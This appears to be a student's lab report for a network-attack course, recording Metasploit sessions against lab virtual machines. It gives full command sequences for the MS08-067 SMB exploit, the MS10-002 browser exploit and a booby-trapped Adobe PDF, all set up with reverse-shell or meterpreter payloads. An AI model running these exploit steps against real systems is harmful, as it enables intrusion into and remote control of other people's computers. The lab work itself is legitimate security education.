天天看點

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

1.實踐過程記錄

1.1一個主動攻擊實踐,如ms08_067;

msf > search ms08_067_netapi //檢視可以用的工具
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.154.129
msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5203
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.154.144
msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445 //該端口号隻能使用445或139,是對應漏洞的固定端口
msf exploit(windows/smb/ms08_067_netapi) > set target 0
msf exploit(windows/smb/ms08_067_netapi) > exploit

           

一開始反複出現這個錯誤

Exploit failed: No encoders encoded the buffer successfully
           
2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

重新開機攻擊機,并建立一個xp靶機,回連成功。

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

出現以下錯誤:

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

可以嘗試關閉防火牆解決。

1.2 一個針對浏覽器的攻擊,如MS10_002;

可以使用

show options

檢視設定參數的方法。

msf exploit(windows/browser/ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic
           

進行相應設定:

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

在靶機連接配接到該網頁後,直接進入會話

sessions -i 4

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用
2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

1.3 一個針對用戶端的攻擊,如Adobe;

生成pdf:

msf exploit(windows/browser/ms10_002_aurora) > search adobe_cooltype_sing
msf exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.154.129
msf exploit(windows/fileformat/adobe_cooltype_sing) > set LPORT 5203
msf exploit(windows/fileformat/adobe_cooltype_sing) > set FILENAME 20155203dkx.pdf
msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit

[*] Creating '20155203dkx.pdf' file...
[+] 20155203dkx.pdf stored at /root/.msf4/local/20155203dkx.pdf

           

生成的檔案需要在這裡打開顯示隐藏檔案夾:

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

使用監聽子產品回連:

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用
2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

1.4 成功應用任何一個輔助子產品。(0.5分)

  • 選用了scanner/http/webdav_scanner

不太明白這個是幹嘛的本來以為是一個漏洞掃描,直接打開show options檢視了參數,設定了RHOSTS,這裡靶機的位址可以是多個,但是我設定的時候出錯了,實踐表明必須是多個同一網段的主機位址,之後顯示成功,這是表示webdav是開啟的。

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用
  • 使用

    scanner/http/prev_dir_same_name_file

    子產品

這個子產品用來檢索比對目标主機的指定路徑下的檔案。

以下是有關它的功能的描述:

該子產品識别第一個父目錄中與給定目錄路徑具有相同名稱的檔案。 示例:PATH為Test / backup / files /将查找Test路徑下檔案/backup/files.ext,.ext為設定的檔案類型。

以下結果說明掃描成功。

2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

2.離實戰還缺些什麼技術或步驟?

實戰的話應該要從具體的靶機環境考慮,不能隻依賴msf這個工具。

3.實踐總結與體會

msf是一個比較全面的工具,從這次實驗中可以看出msf能做的滲透攻擊還是很局限的,必須使用英文版的非常“原始”的xp。但是能從各種角度攻擊成功,非常有成就感

4.基礎問題回答

(1)用自己的話解釋什麼是exploit,payload,encode.

exploit是用來發起攻擊的載體。

payload是執行攻擊的代碼。

encode是攻擊代碼的編碼方式。